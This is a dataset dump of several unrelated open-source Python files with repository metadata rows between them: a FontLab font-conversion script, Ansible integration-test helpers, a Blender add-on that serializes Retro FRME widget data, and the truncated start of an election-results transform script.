goadbPath = sameLevel
elif os.path.exists(oneUp):
goadbPath = oneUp
elif os.path.exists(twoUp):
goadbPath = twoUp
if goadbPath:
encPath = makeTempEncFileFromGOADB(goadbPath)
else:
print "Could not find %s file." % kGOADBfileName
print "Skipping %s" % pfaPath
print
if not encPath:
continue
# Checking if a derivedchars file exists.
# If not, the dvInput step is skipped.
makeDV = False
for file in os.listdir(os.path.split(pfaPath)[0]):
if re.search(r'derivedchars(.+?)?$', file) and dvModuleFound:
makeDV = True
fontIsTXT = False
fontIsUFO = False
if kFontTXT in pfaPath:
fontIsTXT = True
pfaPath = convertTXTfontToPFA(pfaPath)
elif kFontUFO in pfaPath or (pfaPath[-4:].lower() in [".ufo"]):
# Support more than just files named "font.ufo"
fontIsUFO = True
pfaPath = convertUFOfontToPFA(pfaPath)
fl.Open(pfaPath)
print "\nProcessing %s ... (%d/%d)" % (
fl.font.font_name, fontIndex, totalFonts)
fontIndex += 1
fontZonesWereReplaced = replaceFontZonesByFamilyZones()
baselineZonesWereRemoved = removeBottomZonesAboveBaseline()
# NOTE: After making changes to the PostScript alignment zones, the TT
# equivalents have to be updated as well, but I couldn't find a way
# to do it via scripting (because TTH.top_zones and TTH.bottom_zones
# are read-only, and despite that functionality being available in
# the UI, there's no native function to update TT zones from T1 zones).
# So the solution is to generate a new T1 font and open it back.
pfaPathTemp = pfaPath.replace('.pfa', '_TEMP_.pfa')
infPathTemp = pfaPathTemp.replace('.pfa', '.inf')
if baselineZonesWereRemoved or fontZonesWereReplaced:
fl.GenerateFont(eval("ftTYPE1ASCII"), pfaPathTemp)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
fl.Open(pfaPathTemp)
if os.path.exists(infPathTemp):
# Delete the .INF file (bug in FL v5.1.x)
os.remove(infPathTemp)
# Load encoding file
fl.font.encoding.Load(encPath)
# Make sure the Font window is in 'Names mode'
fl.CallCommand(fl_cmd.FontModeNames)
# Sort glyphs by encoding
fl.CallCommand(fl_cmd.FontSortByCodepage)
# read derivedchars file, make components
if makeDV:
dvInput_module.run(verbose=False)
convertT1toTT()
changeTTfontSettings()
# Switch the Font window to 'Index mode'
fl.CallCommand(fl_cmd.FontModeIndex)
# path to the folder containing the font, and the font's file name
folderPath, fontFileName = os.path.split(pfaPath)
ppmsFilePath = os.path.join(folderPath, kPPMsFileName)
if os.path.exists(ppmsFilePath):
hPPMs, vPPMs = readPPMsFile(ppmsFilePath)
replaceStemsAndPPMs(hPPMs, vPPMs)
tthintsFilePath = os.path.join(folderPath, kTTHintsFileName)
if os.path.exists(tthintsFilePath):
inputTTHints.run(folderPath)
# readTTHintsFile(tthintsFilePath)
# replaceTTHints()
# FontLab 5.1.5 Mac Build 5714 does NOT respect the unchecked
# option "Automatically add .null, CR and space characters"
for gName in ["NULL", "CR"]:
gIndex = fl.font.FindGlyph(gName)
if gIndex != -1:
del fl.font.glyphs[gIndex]
vfbPath = pfaPath.replace('.pfa', '.vfb')
fl.Save(vfbPath)
# The filename of the TT output is hardcoded
ttfPath = os.path.join(folderPath, kFontTTF)
fl.GenerateFont(eval("ftTRUETYPE"), ttfPath)
fl[fl.ifont].modified = 0
fl.Close(fl.ifont)
# The TT font generated with FontLab ends up with a few glyph names
# changed. Fix the glyph names so that makeOTF does not fail.
        postProcessTTF(ttfPath)
# Delete temporary Encoding file:
if os.path.exists(encPath):
os.remove(encPath)
# Delete temp PFA:
if os.path.exists(pfaPathTemp):
os.remove(pfaPathTemp)
# Cleanup after processing from TXT type1 font or UFO font
if fontIsTXT or fontIsUFO:
if os.path.exists(pfaPath):
os.remove(pfaPath)
if os.path.exists(ttfPath):
finalTTFpath = ttfPath.replace('_TEMP_.ttf', '.ttf')
if finalTTFpath != ttfPath:
                    if PC and os.path.exists(finalTTFpath):
                        os.remove(finalTTFpath)
os.rename(ttfPath, finalTTFpath)
if os.path.exists(vfbPath):
finalVFBpath = vfbPath.replace('_TEMP_.vfb', '.vfb')
if finalVFBpath != vfbPath:
if PC and os.path.exists(finalVFBpath):
os.remove(finalVFBpath)
os.rename(vfbPath, finalVFBpath)
# remove FontLab leftovers
pfmPath = pfaPathTemp.replace('.pfa', '.pfm')
afmPath = pfaPathTemp.replace('.pfa', '.afm')
if os.path.exists(pfmPath):
os.remove(pfmPath)
if os.path.exists(afmPath):
os.remove(afmPath)
def run():
# Get folder to process
baseFolderPath = fl.GetPathName("Select font family directory")
if not baseFolderPath: # Cancel was clicked or ESC key was pressed
return
startTime = time.time()
fontsList = getFontPaths(baseFolderPath)
if len(fontsList):
processFonts(fontsList)
else:
print "No fonts found"
endTime = time.time()
elapsedSeconds = endTime-startTime
if (elapsedSeconds/60) < 1:
print '\nCompleted in %.1f seconds.\n' % elapsedSeconds
else:
print '\nCompleted in %d minutes and %d seconds.\n' % (
elapsedSeconds/60, elapsedSeconds%60)
if __name__ == "__main__":
if not errorHappened:
run()
| mit | -4,984,340,435,244,985,000 | 34.212637 | 131 | 0.621636 | false |
ujenmr/ansible | test/runner/lib/integration/__init__.py | 1 | 7973 | """Ansible integration test infrastructure."""
from __future__ import absolute_import, print_function
import contextlib
import json
import os
import shutil
import tempfile
from lib.target import (
analyze_integration_target_dependencies,
walk_integration_targets,
)
from lib.config import (
NetworkIntegrationConfig,
PosixIntegrationConfig,
WindowsIntegrationConfig,
)
from lib.util import (
ApplicationError,
display,
make_dirs,
named_temporary_file,
)
from lib.cache import (
CommonCache,
)
from lib.cloud import (
CloudEnvironmentConfig,
)
def generate_dependency_map(integration_targets):
"""
:type integration_targets: list[IntegrationTarget]
:rtype: dict[str, set[IntegrationTarget]]
"""
targets_dict = dict((target.name, target) for target in integration_targets)
target_dependencies = analyze_integration_target_dependencies(integration_targets)
dependency_map = {}
invalid_targets = set()
for dependency, dependents in target_dependencies.items():
dependency_target = targets_dict.get(dependency)
if not dependency_target:
invalid_targets.add(dependency)
continue
for dependent in dependents:
if dependent not in dependency_map:
dependency_map[dependent] = set()
dependency_map[dependent].add(dependency_target)
if invalid_targets:
raise ApplicationError('Non-existent target dependencies: %s' % ', '.join(sorted(invalid_targets)))
return dependency_map
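# Illustrative example (hypothetical target names): if target 'setup_b'
# declares the alias 'needs/target/setup_a', the returned mapping is
# {'setup_b': {<IntegrationTarget: setup_a>}} -- dependent names mapped to
# the set of target objects they require.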
def get_files_needed(target_dependencies):
"""
:type target_dependencies: list[IntegrationTarget]
:rtype: list[str]
"""
files_needed = []
for target_dependency in target_dependencies:
files_needed += target_dependency.needs_file
files_needed = sorted(set(files_needed))
invalid_paths = [path for path in files_needed if not os.path.isfile(path)]
if invalid_paths:
raise ApplicationError('Invalid "needs/file/*" aliases:\n%s' % '\n'.join(invalid_paths))
return files_needed
@contextlib.contextmanager
def integration_test_environment(args, target, inventory_path):
"""
:type args: IntegrationConfig
:type target: IntegrationTarget
:type inventory_path: str
"""
vars_file = 'integration_config.yml'
if args.no_temp_workdir or 'no/temp_workdir/' in target.aliases:
display.warning('Disabling the temp work dir is a temporary debugging feature that may be removed in the future without notice.')
integration_dir = 'test/integration'
ansible_config = os.path.join(integration_dir, '%s.cfg' % args.command)
inventory_name = os.path.relpath(inventory_path, integration_dir)
if '/' in inventory_name:
inventory_name = inventory_path
yield IntegrationEnvironment(integration_dir, inventory_name, ansible_config, vars_file)
return
root_temp_dir = os.path.expanduser('~/.ansible/test/tmp')
prefix = '%s-' % target.name
suffix = u'-\u00c5\u00d1\u015a\u00cc\u03b2\u0141\u00c8'
if args.no_temp_unicode or 'no/temp_unicode/' in target.aliases:
display.warning('Disabling unicode in the temp work dir is a temporary debugging feature that may be removed in the future without notice.')
suffix = '-ansible'
if isinstance('', bytes):
suffix = suffix.encode('utf-8')
if args.explain:
temp_dir = os.path.join(root_temp_dir, '%stemp%s' % (prefix, suffix))
else:
make_dirs(root_temp_dir)
temp_dir = tempfile.mkdtemp(prefix=prefix, suffix=suffix, dir=root_temp_dir)
try:
display.info('Preparing temporary directory: %s' % temp_dir, verbosity=2)
inventory_names = {
PosixIntegrationConfig: 'inventory',
WindowsIntegrationConfig: 'inventory.winrm',
NetworkIntegrationConfig: 'inventory.networking',
}
inventory_name = inventory_names[type(args)]
cache = IntegrationCache(args)
target_dependencies = sorted([target] + list(cache.dependency_map.get(target.name, set())))
files_needed = get_files_needed(target_dependencies)
integration_dir = os.path.join(temp_dir, 'test/integration')
ansible_config = os.path.join(integration_dir, '%s.cfg' % args.command)
file_copies = [
('test/integration/%s.cfg' % args.command, ansible_config),
('test/integration/integration_config.yml', os.path.join(integration_dir, vars_file)),
(inventory_path, os.path.join(integration_dir, inventory_name)),
]
file_copies += [(path, os.path.join(temp_dir, path)) for path in files_needed]
directory_copies = [
(os.path.join('test/integration/targets', target.name), os.path.join(integration_dir, 'targets', target.name)) for target in target_dependencies
]
inventory_dir = os.path.dirname(inventory_path)
host_vars_dir = os.path.join(inventory_dir, 'host_vars')
group_vars_dir = os.path.join(inventory_dir, 'group_vars')
if os.path.isdir(host_vars_dir):
directory_copies.append((host_vars_dir, os.path.join(integration_dir, os.path.basename(host_vars_dir))))
if os.path.isdir(group_vars_dir):
directory_copies.append((group_vars_dir, os.path.join(integration_dir, os.path.basename(group_vars_dir))))
directory_copies = sorted(set(directory_copies))
file_copies = sorted(set(file_copies))
if not args.explain:
make_dirs(integration_dir)
for dir_src, dir_dst in directory_copies:
display.info('Copying %s/ to %s/' % (dir_src, dir_dst), verbosity=2)
if not args.explain:
shutil.copytree(dir_src, dir_dst, symlinks=True)
for file_src, file_dst in file_copies:
display.info('Copying %s to %s' % (file_src, file_dst), verbosity=2)
if not args.explain:
make_dirs(os.path.dirname(file_dst))
shutil.copy2(file_src, file_dst)
yield IntegrationEnvironment(integration_dir, inventory_name, ansible_config, vars_file)
finally:
if not args.explain:
shutil.rmtree(temp_dir)
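# Usage sketch (an assumption about the calling convention; the actual
# callers live in the integration commands):
#
#   with integration_test_environment(args, target, inventory_path) as test_env:
#       # run ansible-playbook with cwd=test_env.integration_dir, using
#       # test_env.inventory_path and the config at test_env.ansible_config
#       ...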
@contextlib.contextmanager
def integration_test_config_file(args, env_config, integration_dir):
"""
:type args: IntegrationConfig
:type env_config: CloudEnvironmentConfig
:type integration_dir: str
"""
if not env_config:
yield None
return
config_vars = (env_config.ansible_vars or {}).copy()
config_vars.update(dict(
ansible_test=dict(
environment=env_config.env_vars,
module_defaults=env_config.module_defaults,
)
))
config_file = json.dumps(config_vars, indent=4, sort_keys=True)
with named_temporary_file(args, 'config-file-', '.json', integration_dir, config_file) as path:
filename = os.path.relpath(path, integration_dir)
display.info('>>> Config File: %s\n%s' % (filename, config_file), verbosity=3)
yield path
class IntegrationEnvironment(object):
"""Details about the integration environment."""
def __init__(self, integration_dir, inventory_path, ansible_config, vars_file):
self.integration_dir = integration_dir
self.inventory_path = inventory_path
self.ansible_config = ansible_config
self.vars_file = vars_file
class IntegrationCache(CommonCache):
"""Integration cache."""
@property
def integration_targets(self):
"""
:rtype: list[IntegrationTarget]
"""
return self.get('integration_targets', lambda: list(walk_integration_targets()))
@property
def dependency_map(self):
"""
:rtype: dict[str, set[IntegrationTarget]]
"""
return self.get('dependency_map', lambda: generate_dependency_map(self.integration_targets))
| gpl-3.0 | 6,827,618,228,914,543,000 | 30.892 | 156 | 0.654835 | false |
RetroView/hecl | blender/hecl/frme.py | 3 | 21197 | import bpy, struct, math
from mathutils import Quaternion
def draw(layout, context):
if bpy.context.active_object:
obj = bpy.context.active_object
layout.label(text="Widget Settings:", icon='OBJECT_DATA')
layout.prop_menu_enum(obj, 'retro_widget_type', text='Widget Type')
#layout.prop_search(obj, 'retro_widget_parent', context.scene, 'objects', text='Widget Parent')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_default_visible', text='Visible')
row.prop(obj, 'retro_widget_default_active', text='Active')
row.prop(obj, 'retro_widget_cull_faces', text='Cull Faces')
layout.prop(obj, 'retro_widget_color', text='Color')
layout.prop_menu_enum(obj, 'retro_widget_model_draw_flags', text='Draw Flags')
row = layout.row(align=True)
row.prop(obj, 'retro_widget_is_worker', text='Is Worker')
if obj.retro_widget_is_worker:
row.prop(obj, 'retro_widget_worker_id', text='Worker Id')
if obj.retro_widget_type == 'RETRO_MODL':
layout.prop(obj, 'retro_model_light_mask', text='Light Mask')
elif obj.retro_widget_type == 'RETRO_PANE':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
elif obj.retro_widget_type == 'RETRO_TXPN':
layout.prop(obj, 'retro_pane_dimensions', text='Dimensions')
layout.prop(obj, 'retro_pane_scale_center', text='Center')
layout.prop(obj, 'retro_textpane_font_path', text='Font Path')
row = layout.row(align=True)
row.prop(obj, 'retro_textpane_word_wrap', text='Word Wrap')
row.prop(obj, 'retro_textpane_horizontal', text='Horizontal')
layout.prop(obj, 'retro_textpane_fill_color', text='Fill Color')
layout.prop(obj, 'retro_textpane_outline_color', text='Outline Color')
layout.prop(obj, 'retro_textpane_block_extent', text='Point Dimensions')
layout.prop(obj, 'retro_textpane_jp_font_path', text='JP Font Path')
layout.prop(obj, 'retro_textpane_jp_font_scale', text='JP Point Dimensions')
layout.prop_menu_enum(obj, 'retro_textpane_hjustification', text='Horizontal Justification')
layout.prop_menu_enum(obj, 'retro_textpane_vjustification', text='Vertical Justification')
elif obj.retro_widget_type == 'RETRO_TBGP':
layout.prop(obj, 'retro_tablegroup_elem_count', text='Element Count')
layout.prop(obj, 'retro_tablegroup_elem_default', text='Default Element')
layout.prop(obj, 'retro_tablegroup_wraparound', text='Wraparound')
elif obj.retro_widget_type == 'RETRO_GRUP':
layout.prop(obj, 'retro_group_default_worker', text='Default Worker')
elif obj.retro_widget_type == 'RETRO_SLGP':
row = layout.row(align=True)
row.prop(obj, 'retro_slider_min', text='Min')
row.prop(obj, 'retro_slider_max', text='Max')
layout.prop(obj, 'retro_slider_default', text='Default')
layout.prop(obj, 'retro_slider_increment', text='Increment')
elif obj.retro_widget_type == 'RETRO_ENRG':
layout.prop(obj, 'retro_energybar_texture_path', text='Energy Bar Texture Path')
elif obj.retro_widget_type == 'RETRO_METR':
layout.prop(obj, 'retro_meter_no_round_up', text='No Round Up')
layout.prop(obj, 'retro_meter_max_capacity', text='Max Capacity')
layout.prop(obj, 'retro_meter_worker_count', text='Worker Count')
elif obj.retro_widget_type == 'RETRO_LITE':
if obj.data and obj.type == 'LIGHT':
layout.prop(obj.data, 'retro_light_index', text='Index')
layout.label(text="Angular Falloff:", icon='LIGHT')
row = layout.row(align=True)
row.prop(obj.data, 'retro_light_angle_constant', text='Constant')
row.prop(obj.data, 'retro_light_angle_linear', text='Linear')
row.prop(obj.data, 'retro_light_angle_quadratic', text='Quadratic')
hjustifications = None
vjustifications = None
model_draw_flags_e = None
def recursive_cook(buffer, obj, version, path_hasher, parent_name):
buffer += struct.pack('>4s', obj.retro_widget_type[6:].encode())
buffer += obj.name.encode() + b'\0'
buffer += parent_name.encode() + b'\0'
buffer += struct.pack('>bbbbffffI',
False,
obj.retro_widget_default_visible,
obj.retro_widget_default_active,
obj.retro_widget_cull_faces,
obj.retro_widget_color[0],
obj.retro_widget_color[1],
obj.retro_widget_color[2],
obj.retro_widget_color[3],
model_draw_flags_e[obj.retro_widget_model_draw_flags])
angle = Quaternion((1.0, 0.0, 0.0), 0)
if obj.retro_widget_type == 'RETRO_CAMR':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
aspect = bpy.context.scene.render.resolution_x / bpy.context.scene.render.resolution_y
if obj.data.type == 'PERSP':
if aspect > 1.0:
fov = math.degrees(math.atan(math.tan(obj.data.angle / 2.0) / aspect)) * 2.0
else:
fov = math.degrees(obj.data.angle)
buffer += struct.pack('>Iffff', 0, fov, aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.data.type == 'ORTHO':
ortho_half = obj.data.ortho_scale / 2.0
buffer += struct.pack('>Iffffff', 1, -ortho_half, ortho_half, ortho_half / aspect,
-ortho_half / aspect, obj.data.clip_start, obj.data.clip_end)
elif obj.retro_widget_type == 'RETRO_MODL':
        if len(obj.children) == 0:
            raise RuntimeError('Model Widget must have a child model object')
        model_obj = obj.children[0]
        if model_obj.type != 'MESH':
            raise RuntimeError('Model Widget must have a child MESH')
        if not model_obj.data.library:
            raise RuntimeError('Model Widget must have a linked library MESH')
path = bpy.path.abspath(model_obj.data.library.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>III', path_hash, 0, obj.retro_model_light_mask)
elif obj.retro_widget_type == 'RETRO_PANE':
buffer += struct.pack('>fffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2])
elif obj.retro_widget_type == 'RETRO_TXPN':
path_hash = path_hasher.hashpath32(obj.retro_textpane_font_path)
buffer += struct.pack('>fffffIbbIIffffffffff',
obj.retro_pane_dimensions[0],
obj.retro_pane_dimensions[1],
obj.retro_pane_scale_center[0],
obj.retro_pane_scale_center[1],
obj.retro_pane_scale_center[2],
path_hash,
obj.retro_textpane_word_wrap,
obj.retro_textpane_horizontal,
hjustifications[obj.retro_textpane_hjustification],
vjustifications[obj.retro_textpane_vjustification],
obj.retro_textpane_fill_color[0],
obj.retro_textpane_fill_color[1],
obj.retro_textpane_fill_color[2],
obj.retro_textpane_fill_color[3],
obj.retro_textpane_outline_color[0],
obj.retro_textpane_outline_color[1],
obj.retro_textpane_outline_color[2],
obj.retro_textpane_outline_color[3],
obj.retro_textpane_block_extent[0],
obj.retro_textpane_block_extent[1])
if version >= 1:
path_hash = path_hasher.hashpath32(obj.retro_textpane_jp_font_path)
buffer += struct.pack('>III',
path_hash,
obj.retro_textpane_jp_font_scale[0],
obj.retro_textpane_jp_font_scale[1])
elif obj.retro_widget_type == 'RETRO_TBGP':
buffer += struct.pack('>HHIHHbbffbfHHHH',
obj.retro_tablegroup_elem_count,
0,
0,
obj.retro_tablegroup_elem_default,
0,
obj.retro_tablegroup_wraparound,
False,
0.0,
0.0,
False,
0.0,
0,
0,
0,
0)
elif obj.retro_widget_type == 'RETRO_GRUP':
buffer += struct.pack('>Hb',
obj.retro_group_default_worker,
False)
elif obj.retro_widget_type == 'RETRO_SLGP':
buffer += struct.pack('>ffff',
obj.retro_slider_min,
obj.retro_slider_max,
obj.retro_slider_default,
obj.retro_slider_increment)
elif obj.retro_widget_type == 'RETRO_ENRG':
path_hash = path_hasher.hashpath32(obj.retro_energybar_texture_path)
buffer += struct.pack('>I', path_hash)
elif obj.retro_widget_type == 'RETRO_METR':
buffer += struct.pack('>bbII',
False,
obj.retro_meter_no_round_up,
obj.retro_meter_max_capacity,
obj.retro_meter_worker_count)
elif obj.retro_widget_type == 'RETRO_LITE':
angle = Quaternion((1.0, 0.0, 0.0), math.radians(-90.0))
type_enum = 0
constant = 1.0
linear = 0.0
quadratic = 0.0
cutoff = 0.0
if obj.data.type == 'POINT':
type_enum = 4
elif obj.data.type == 'SUN':
type_enum = 2
elif obj.data.type == 'SPOT':
type_enum = 0
cutoff = obj.data.spot_size
if obj.data.type == 'POINT' or obj.data.type == 'SPOT':
constant = obj.data.constant_coefficient
linear = obj.data.linear_coefficient
quadratic = obj.data.quadratic_coefficient
buffer += struct.pack('>IffffffI',
type_enum, constant, linear, quadratic,
obj.data.retro_light_angle_constant,
obj.data.retro_light_angle_linear,
obj.data.retro_light_angle_quadratic,
obj.data.retro_light_index)
if obj.data.type == 'SPOT':
buffer += struct.pack('>f', cutoff)
elif obj.retro_widget_type == 'RETRO_IMGP':
        if obj.type != 'MESH':
            raise RuntimeError('Imagepane Widget must be a MESH')
        if len(obj.data.loops) < 4:
            raise RuntimeError('Imagepane Widget must be a MESH with 4 verts')
        if len(obj.data.uv_layers) < 1:
            raise RuntimeError('Imagepane Widget must be a MESH with a UV layer')
path_hash = 0xffffffff
if len(obj.data.materials):
material = obj.data.materials[0]
if 'Image Texture' in material.node_tree.nodes:
image_node = material.node_tree.nodes['Image Texture']
if image_node.image:
image = image_node.image
path = bpy.path.abspath(image.filepath)
path_hash = path_hasher.hashpath32(path)
buffer += struct.pack('>IIII', path_hash, 0, 0, 4)
for i in range(4):
vi = obj.data.loops[i].vertex_index
co = obj.data.vertices[vi].co
buffer += struct.pack('>fff', co[0], co[1], co[2])
buffer += struct.pack('>I', 4)
for i in range(4):
co = obj.data.uv_layers[0].data[i].uv
buffer += struct.pack('>ff', co[0], co[1])
if obj.retro_widget_is_worker:
buffer += struct.pack('>bH', True, obj.retro_widget_worker_id)
else:
buffer += struct.pack('>b', False)
angMtx = angle.to_matrix() @ obj.matrix_local.to_3x3()
buffer += struct.pack('>fffffffffffffffIH',
obj.matrix_local[0][3],
obj.matrix_local[1][3],
obj.matrix_local[2][3],
angMtx[0][0], angMtx[0][1], angMtx[0][2],
angMtx[1][0], angMtx[1][1], angMtx[1][2],
angMtx[2][0], angMtx[2][1], angMtx[2][2],
0.0, 0.0, 0.0, 0, 0)
ch_list = []
for ch in obj.children:
ch_list.append((ch.pass_index, ch.name))
for s_pair in sorted(ch_list):
ch = bpy.data.objects[s_pair[1]]
if ch.retro_widget_type != 'RETRO_NONE':
recursive_cook(buffer, ch, version, path_hasher, obj.name)
def cook(writepipebuf, version, path_hasher):
global hjustifications, vjustifications, model_draw_flags_e
hjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_hjustification[1]['items'])
vjustifications = dict((i[0], i[3]) for i in bpy.types.Object.retro_textpane_vjustification[1]['items'])
model_draw_flags_e = dict((i[0], i[3]) for i in bpy.types.Object.retro_widget_model_draw_flags[1]['items'])
buffer = bytearray()
buffer += struct.pack('>IIII', 0, 0, 0, 0)
widget_count = 0
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE':
widget_count += 1
buffer += struct.pack('>I', widget_count)
for obj in bpy.data.objects:
if obj.retro_widget_type != 'RETRO_NONE' and not obj.parent:
recursive_cook(buffer, obj, version, path_hasher, 'kGSYS_DummyWidgetID')
return buffer
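# Shape of the cooked FRME buffer, as implied by the struct.pack calls above
# (big-endian throughout): four reserved uint32 zeros, a uint32 widget count,
# then every widget serialized depth-first by recursive_cook(), with children
# visited in ascending pass_index order.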
# Registration
def register():
frame_widget_types = [
('RETRO_NONE', 'Not a Widget', '', 0),
('RETRO_BWIG', 'Base Widget', '', 1),
('RETRO_CAMR', 'Camera', '', 2),
('RETRO_ENRG', 'Energy Bar', '', 3),
('RETRO_GRUP', 'Group', '', 4),
('RETRO_HWIG', 'Head Widget', '', 5),
('RETRO_IMGP', 'Image Pane', '', 6),
('RETRO_LITE', 'Light', '', 7),
('RETRO_MODL', 'Model', '', 8),
('RETRO_METR', 'Meter', '', 9),
('RETRO_PANE', 'Pane', '', 10),
('RETRO_SLGP', 'Slider Group', '', 11),
('RETRO_TBGP', 'Table Group', '', 12),
('RETRO_TXPN', 'Text Pane', '', 13)]
bpy.types.Object.retro_widget_type = bpy.props.EnumProperty(items=frame_widget_types, name='Retro: FRME Widget Type', default='RETRO_NONE')
model_draw_flags = [
('RETRO_SHADELESS', 'Shadeless', '', 0),
('RETRO_OPAQUE', 'Opaque', '', 1),
('RETRO_ALPHA', 'Alpha', '', 2),
('RETRO_ADDITIVE', 'Additive', '', 3),
('RETRO_ALPHA_ADDITIVE_OVERDRAW', 'Alpha Additive Overdraw', '', 4)]
bpy.types.Object.retro_widget_parent = bpy.props.StringProperty(name='Retro: FRME Widget Parent', description='Refers to internal frame widgets')
    bpy.types.Object.retro_widget_use_anim_controller = bpy.props.BoolProperty(name='Retro: Use Animation Controller')
bpy.types.Object.retro_widget_default_visible = bpy.props.BoolProperty(name='Retro: Default Visible', description='Sets widget is visible by default')
bpy.types.Object.retro_widget_default_active = bpy.props.BoolProperty(name='Retro: Default Active', description='Sets widget is cases by default')
bpy.types.Object.retro_widget_cull_faces = bpy.props.BoolProperty(name='Retro: Cull Faces', description='Enables face culling')
bpy.types.Object.retro_widget_color = bpy.props.FloatVectorProperty(name='Retro: Color', description='Sets widget color', subtype='COLOR', size=4, min=0.0, max=1.0)
bpy.types.Object.retro_widget_model_draw_flags = bpy.props.EnumProperty(items=model_draw_flags, name='Retro: Model Draw Flags', default='RETRO_ALPHA')
bpy.types.Object.retro_widget_is_worker = bpy.props.BoolProperty(name='Retro: Is Worker Widget', default=False)
bpy.types.Object.retro_widget_worker_id = bpy.props.IntProperty(name='Retro: Worker Widget ID', min=0, default=0)
bpy.types.Object.retro_model_light_mask = bpy.props.IntProperty(name='Retro: Model Light Mask', min=0, default=0)
bpy.types.Object.retro_pane_dimensions = bpy.props.FloatVectorProperty(name='Retro: Pane Dimensions', min=0.0, size=2)
bpy.types.Object.retro_pane_scale_center = bpy.props.FloatVectorProperty(name='Retro: Scale Center', size=3)
bpy.types.Object.retro_textpane_font_path = bpy.props.StringProperty(name='Retro: Font Path')
bpy.types.Object.retro_textpane_word_wrap = bpy.props.BoolProperty(name='Retro: Word Wrap')
bpy.types.Object.retro_textpane_horizontal = bpy.props.BoolProperty(name='Retro: Horizontal', default=True)
bpy.types.Object.retro_textpane_fill_color = bpy.props.FloatVectorProperty(name='Retro: Fill Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_outline_color = bpy.props.FloatVectorProperty(name='Retro: Outline Color', min=0.0, max=1.0, size=4, subtype='COLOR')
bpy.types.Object.retro_textpane_block_extent = bpy.props.FloatVectorProperty(name='Retro: Block Extent', min=0.0, size=2)
bpy.types.Object.retro_textpane_jp_font_path = bpy.props.StringProperty(name='Retro: Japanese Font Path')
bpy.types.Object.retro_textpane_jp_font_scale = bpy.props.IntVectorProperty(name='Retro: Japanese Font Scale', min=0, size=2)
frame_textpane_hjustifications = [
('LEFT', 'Left', '', 0),
('CENTER', 'Center', '', 1),
('RIGHT', 'Right', '', 2),
('FULL', 'Full', '', 3),
('NLEFT', 'Left Normalized', '', 4),
('NCENTER', 'Center Normalized', '', 5),
('NRIGHT', 'Right Normalized', '', 6),
('LEFTMONO', 'Left Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('RIGHTMONO', 'Right Monospaced', '', 9)]
bpy.types.Object.retro_textpane_hjustification = bpy.props.EnumProperty(items=frame_textpane_hjustifications, name='Retro: Horizontal Justification', default='LEFT')
frame_textpane_vjustifications = [
('TOP', 'Top', '', 0),
('CENTER', 'Center', '', 1),
('BOTTOM', 'Bottom', '', 2),
('FULL', 'Full', '', 3),
('NTOP', 'Top Normalized', '', 4),
('NCENTER', 'Center Normalized', '', 5),
('NBOTTOM', 'Bottom Normalized', '', 6),
('TOPMONO', 'Top Monospaced', '', 7),
('CENTERMONO', 'Center Monospaced', '', 8),
('BOTTOMMONO', 'Bottom Monospaced', '', 9)]
bpy.types.Object.retro_textpane_vjustification = bpy.props.EnumProperty(items=frame_textpane_vjustifications, name='Retro: Vertical Justification', default='TOP')
bpy.types.Object.retro_tablegroup_elem_count = bpy.props.IntProperty(name='Retro: Table Group Element Count', min=0, default=0)
bpy.types.Object.retro_tablegroup_elem_default = bpy.props.IntProperty(name='Retro: Table Group Default Element', min=0, default=0)
bpy.types.Object.retro_tablegroup_wraparound = bpy.props.BoolProperty(name='Retro: Table Group Wraparound', default=False)
bpy.types.Object.retro_group_default_worker = bpy.props.IntProperty(name='Retro: Group Default Worker', min=0, default=0)
bpy.types.Object.retro_slider_min = bpy.props.FloatProperty(name='Retro: Slider Min', default=0.0)
bpy.types.Object.retro_slider_max = bpy.props.FloatProperty(name='Retro: Slider Max', default=1.0)
bpy.types.Object.retro_slider_default = bpy.props.FloatProperty(name='Retro: Slider Default', default=0.0)
bpy.types.Object.retro_slider_increment = bpy.props.FloatProperty(name='Retro: Slider Increment', min=0.0, default=1.0)
bpy.types.Object.retro_energybar_texture_path = bpy.props.StringProperty(name='Retro: Energy Bar Texture Path')
bpy.types.Object.retro_meter_no_round_up = bpy.props.BoolProperty(name='Retro: No Round Up', default=True)
bpy.types.Object.retro_meter_max_capacity = bpy.props.IntProperty(name='Retro: Max Capacity', min=0, default=100)
bpy.types.Object.retro_meter_worker_count = bpy.props.IntProperty(name='Retro: Worker Count', min=0, default=1)
bpy.types.Light.retro_light_index = bpy.props.IntProperty(name='Retro: Light Index', min=0, default=0)
bpy.types.Light.retro_light_angle_constant = bpy.props.FloatProperty(name='Retro: Light Angle Constant', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_linear = bpy.props.FloatProperty(name='Retro: Light Angle Linear', min=0.0, default=0.0)
bpy.types.Light.retro_light_angle_quadratic = bpy.props.FloatProperty(name='Retro: Light Angle Quadratic', min=0.0, default=0.0)
| mit | -7,502,796,951,139,289,000 | 53.212276 | 169 | 0.586168 | false |
lanacioncom/elecciones_2015_caba | backend/scripts/apitransforms.py | 1 | 8671 | # coding: utf-8
import logging
# TODO Remove only for testing
import json
import io
from utils import get_percentage, format_percentage, sort_results_by_percentage
from config import JSON_EXAMPLE_PATH, SPECIAL_PARTIES, PASS_THRESHOLD
from config import Paso2015
log = logging.getLogger('paso.%s' % (__name__))
PERC_KEYS = ["pct", "pct_total"]
RESUMEN_RENAME = {
'Electores': 'e',
'VotantesJef': 'v',
'Mesas': 'mt',
'MesasInformadas': 'mi',
'UltimaActualizacion': 'ut'
}
RESULTS_CAND_RENAME = {
"id_candidato": "id",
"votos": "v",
"pct": "p",
"pct_total": "pt"
}
RESULTS_PARTY_RENAME = {
"votos": "v",
"pct": "p",
"id_partido": "id",
}
RESULTS_PARTY_SUMM_RENAME = {
"votos": "v",
"pct": "p",
}
def to_json(fname=None, d=None):
'''For testing purposes'''
with io.open('%s/%s.json'
